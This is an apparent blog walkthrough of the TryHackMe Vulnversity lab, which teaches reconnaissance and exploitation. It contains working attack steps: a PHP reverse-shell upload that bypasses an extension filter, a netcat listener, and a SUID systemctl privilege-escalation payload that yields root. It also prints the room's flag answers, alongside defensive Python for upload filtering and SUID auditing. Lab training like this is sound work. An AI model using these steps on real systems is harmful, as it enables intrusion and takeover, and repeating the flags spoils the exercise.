TryHackMe CTF: Vulnversity – Walkthrough

December 12, 2024, by Jasper
Hi! It is time to look at the Vulnversity CTF on TryHackMe. I am making these walkthroughs to keep myself motivated to learn cyber security, and to ensure that I remember the knowledge gained from THM's rooms.

Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Vulnversity TryHackMe room

Room URL: https://tryhackme.com/room/vulnversity


Task 1 (Deploy the machine)

Deploy the machine and move on!

Questions

Deploy the machine

Answer: No answer needed


Task 2 (Reconnaissance)

Gather information about this machine using a network scanning tool called nmap. Check out the Nmap room for more on this!

Don’t have a Linux machine with nmap on? Deploy your own AttackBox and control it with your browser.

nmap is a free, open-source and powerful tool used to discover hosts and services on a computer network. In our example, we are using nmap to scan this machine to identify all services that are running on a particular port.

Common nmap flag descriptions

  • -sV: Attempts to determine the version of the services running
  • -p <x> or -p-: Port scan for port <x> or scan all ports
  • -Pn: Disable host discovery and just scan for open ports
  • -A: Enables OS and version detection, executes in-built scripts for further enumeration
  • -sC: Scan with the default nmap scripts
  • -v: Verbose mode
  • -sU: UDP port scan
  • -sS: TCP SYN port scan

Questions

Scan this box: nmap -sV <machines ip>

You could definitely use the above command, but that would limit the scan to version detection. I will instead use:

nmap -A -sC -p- <target ip>

This gives us a bunch more information (for example on operating systems), and runs some basic scripts as well. Bear in mind, it will be a lot slower.

The open ports, OS and version info are as follows:

Nmap open ports

And the script results:

Nmap script results

Answer: No answer needed

Scan the box, how many ports are open?

See above. The answer is six.

Answer: 6

What version of the squid proxy is running on the machine?

The answer to this question is on the first screenshot as well. On port 3128 we have squid proxy version 3.5.12 running.

Answer: 3.5.12

How many ports will nmap scan if the flag -p-400 was used?

This flag makes nmap scan all ports from 1 through 400. Source: https://nmap.org/book/port-scanning-options.html

Answer: 400

Using the nmap flag -n what will it not resolve?

With the -n flag set, nmap will not resolve DNS names. Source:
https://nmap.org/book/man-briefoptions.html

Answer: DNS

What is the most likely operating system this machine is running?

On both screenshots, Ubuntu gets mentioned multiple times!

Answer: Ubuntu

What port is the web server running on?

This is port 3333. We can open it in the browser:

Visiting the webpage

This is pretty special, as normally websites run on port 80 (HTTP) or port 443 (HTTPS).

Answer: 3333

It's important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important. Don't forget that ports in a higher range might be open, so always scan ports above 1000 (even if you leave the scan running in the background).

Answer: No answer needed


Task 3 (Locating directories using Gobuster)

Using a fast directory discovery tool called GoBuster, you will locate a directory that you can use to upload a shell to.

Let's first start off by scanning the website to find any hidden directories. To do this, we're going to use GoBuster.

GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.

Download GoBuster here, or if you’re on Kali Linux 2020.1+ run sudo apt-get install gobuster

To get started, you will need a wordlist for GoBuster (which will be used to quickly go through candidate names and identify whether a public directory is available). If you are using Kali Linux you can find many wordlists under /usr/share/wordlists.

GoBuster flag descriptions

  • -e: Print the full URLs in your console
  • -u: The target URL
  • -w: Path to your wordlist
  • -U and -P: Username and Password for Basic Auth
  • -p <x>: Proxy to use for requests
  • -c <http cookies>: Specify a cookie for simulating your auth

Questions

Now let's run GoBuster with a wordlist: gobuster dir -u http://<ip>:3333 -w <word list location>

I decided to go with the following command and wordlist:

gobuster dir -u http://10.10.109.122:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

This gives the following result:

Gobuster results

The internal directory seems interesting.

Answer: No answer needed

What is the directory that has an upload form page?

If we visit the internal page on the browser we get the following:

Finding the internal upload page

Hurrah!

Answer: /internal/


Task 4 (Compromise the webserver)

Now that you have found a form to upload files, we can leverage this to upload and execute our payload, which will lead to compromising the web server.

Questions

Try uploading a few file types to the server. What common extension seems to be blocked?

I have played around with some extensions, but the correct answer to this question seems to be php.

I found the following payload: https://github.com/pentestmonkey/php-reverse-shell

And tried to upload it:

Trying to upload the php reverse shell

Note: To figure out the programming language running the website you can use Wappalyzer, which can be run as a Firefox plugin.

Wappalyzer information

Answer: php

To identify which extensions are not blocked, we're going to fuzz the upload form. To do this, we're going to use BurpSuite. If you are unsure what BurpSuite is, or how to set it up, please complete our BurpSuite room first.

Answer: No answer needed

We’re going to use Intruder (used for automating customised attacks).

To begin, make a wordlist with the following extensions: .php, .php3, .php4, .php5, .phtml

Now make sure BurpSuite is configured to intercept all your browser traffic. Upload a file, once this request is captured, send it to the Intruder. Click on “Payloads” and select the “Sniper” attack type. Click the “Positions” tab now, find the filename and “Add §” to the extension:

Editing the extension by using a payload

Run this attack, what extension is allowed?

I hope you understand the above instruction. We basically start running our Burp Suite proxy, and while it is ready to intercept we submit the internal form. We can then intercept this request, and right-click it to send it to Intruder. Here we can edit the payload to make sure we try different file extensions when uploading our shell script.

What THM fails to mention is that you also need to set the payload type to a simple list and then add the file extensions under the options:

Setting the payload options

IMPORTANT: You need to deselect payload encoding, otherwise this step does not work.

Disabling payload encoding

Now you can run the attack! We can see that all requests return 200, but one of them has a different response length.

Finding the acceptable file extension

If you click on the response from the .phtml payload you can see it returns success!

Answer: .phtml
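The Intruder run above shows the real flaw: the form rejects ".php" by name and nothing else. The following is an added example (not code from the TryHackMe room or from this walkthrough, which never shows the server-side filter) that models that blocklist check next to an allowlist check, and shows which names from the Task 4 wordlist each one lets through. The blocked and allowed extension sets are assumptions about a typical filter, not values taken from the room.

```python
from pathlib import PurePosixPath

# Assumed weak filter: rejects only the one extension the room showed blocked.
BLOCKED_EXTENSIONS = {".php"}

# Hardened alternative (constructed): accept only what an upload feature needs.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}

# Extensions a PHP handler is commonly configured to execute; this is the
# same family of names as the Intruder wordlist in Task 4.
PHP_EXECUTABLE = {".php", ".php3", ".php4", ".php5", ".phtml"}


def weak_blocklist_allows(filename: str) -> bool:
    """Mimics the form: accept unless the last extension is on the blocklist."""
    ext = PurePosixPath(filename).suffix.lower()
    return ext not in BLOCKED_EXTENSIONS


def allowlist_allows(filename: str) -> bool:
    """Hardened check: exactly one extension, and it must be on the allowlist.
    Requiring a single suffix also rejects names like shell.phtml.jpg, which
    a server that honours multiple extensions may still hand to PHP."""
    path = PurePosixPath(filename)
    suffixes = [s.lower() for s in path.suffixes]
    if len(suffixes) != 1 or not path.stem or path.stem.startswith("."):
        return False
    return suffixes[0] in ALLOWED_EXTENSIONS


def executable_by_php(filename: str) -> bool:
    """True if any suffix in the name is one PHP could be told to execute."""
    return any(s.lower() in PHP_EXECUTABLE for s in PurePosixPath(filename).suffixes)


def audit(names):
    """Return (weak_hits, strong_hits): names each check accepts that PHP could run."""
    weak = [n for n in names if weak_blocklist_allows(n) and executable_by_php(n)]
    strong = [n for n in names if allowlist_allows(n) and executable_by_php(n)]
    return weak, strong


if __name__ == "__main__":
    # Constructed sample names mirroring the Intruder wordlist plus two edge cases.
    sample = ["shell.php", "shell.php3", "shell.phtml", "shell.PHP", "shell.phtml.jpg", "photo.png"]
    print(audit(sample))
```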

Now that we know what extension we can use for our payload, we can progress. We are going to use a PHP reverse shell as our payload. A reverse shell works by being called on the remote host and forcing this host to make a connection to you. So you'll listen for incoming connections, upload and have your shell executed, which will beacon out to you to control!

Download the following reverse PHP shell here.

To gain remote access to this machine, follow these steps:

  1. Edit the php-reverse-shell.php file and change the ip to be your attacker machine ip. Then rename this file to php-reverse-shell.phtml. You can do this by running:

     mv php-reverse-shell.php php-reverse-shell.phtml

  2. We're now going to listen for incoming connections using netcat. Run the following command:

     nc -lvnp 1234

  3. Upload your shell and navigate to http://<target ip>:3333/internal/uploads/php-reverse-shell.phtml. This will execute your payload.

  4. You should see a connection on your netcat session.

Gaining a connection!

Note: remember to shut down your Burp Suite interceptor!

Answer: No answer needed

What is the name of the user who manages the webserver?

Have a look at the home directory 🙂

Looking in the home directory

There is a home directory for bill here!

Answer: bill

What is the user flag?

Finding the user flag

There is a file called user.txt in bill’s home directory.

Answer: 8bd7992fbe8a6ad22a63361004cfcedb


Task 5 (Privilege Escalation)

Now you have compromised this machine, we are going to escalate our privileges and become the superuser (root).

In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).

For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password it needs to write to the shadow file, which you do not have access to but root does, so the program runs with root privileges to make the right changes.

Questions

On the system, search for all SUID files. What file stands out?

We can use the following command to list SUID files:

find / -user root -perm -4000 -exec ls -ldb {} \;

/bin/systemctl stands out, as it is used to control and monitor services!

Answer: /bin/systemctl
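The find command above is the manual version of a check a defender should run routinely. As an added example (not code from the room or from this walkthrough), here is a small SUID audit that does the same walk and then flags any root-owned SUID file that is not on an expected baseline; on this box /bin/systemctl is exactly the kind of entry it would report. The baseline list is a constructed assumption for a typical Ubuntu system, not taken from the room.

```python
import os
import stat

# Constructed baseline of binaries that legitimately carry SUID on many
# Ubuntu builds; tune it to your own image before trusting the output.
EXPECTED_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/bin/mount", "/bin/umount"}


def is_suid_owned_by(st_mode: int, st_uid: int, owner_uid: int = 0) -> bool:
    """Pure check on stat fields: regular file, owned by owner_uid, SUID bit set.
    Equivalent to the '-user root -perm -4000' part of the find command."""
    return stat.S_ISREG(st_mode) and st_uid == owner_uid and bool(st_mode & stat.S_ISUID)


def find_suid(root: str, owner_uid: int = 0):
    """Walk root and return sorted paths of SUID files owned by owner_uid.
    Uses lstat so symlinks are judged on their own mode, not their target's."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entries are skipped, as find would report and move on
            if is_suid_owned_by(st.st_mode, st.st_uid, owner_uid):
                hits.append(path)
    return sorted(hits)


def unexpected_suid(paths, baseline=EXPECTED_SUID):
    """Everything SUID that the baseline does not account for: the review list."""
    return [p for p in paths if p not in baseline]


if __name__ == "__main__":
    # Run as: python3 suid_audit.py ; on Vulnversity /bin/systemctl would appear here.
    for path in unexpected_suid(find_suid("/")):
        print("review:", path)
```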

It's challenge time! We have guided you this far; are you able to exploit this system further to escalate your privileges and get the final answer? Become root and get the last flag (/root/root.txt).

We can find some more info on GTFObins:
https://gtfobins.github.io/gtfobins/systemctl/#suid

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

This is pretty complicated! What we do is create a service unit file that reads the root flag and writes it to /tmp/output. The path of this unit file is stored in a variable called TF. Finally, we link the unit into systemd and enable it with --now, which starts the service; because systemctl is SUID root, the service runs as root.

Proceed by reading the /tmp/output file and you will find the key!

Answer: a58ff8579f0a9270368d33a9966c7fd5

Well… we did not get root, did we?

I just wanted to show you a simple case first before showing you how to get root. The principle is basically the same. But instead of writing:

ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"

on line 4, we write the following:

ExecStart=/bin/sh -c "chmod +s /bin/bash"

This is similar in that we again start up a shell as root, but instead of writing the flag to a text file, we set the SUID bit on /bin/bash, so that bash itself will run with its owner's (root's) privileges.

systemctl exploit

We can then run bash by running:

bash -p

The -p flag starts bash in privileged mode, so it does not drop the effective user id it received from the SUID bit, and we get a root shell.

Gaining root access!

We are done! Great job everyone on this Vulnversity room on TryHackMe! Give me a clap if you enjoyed this article 🙂

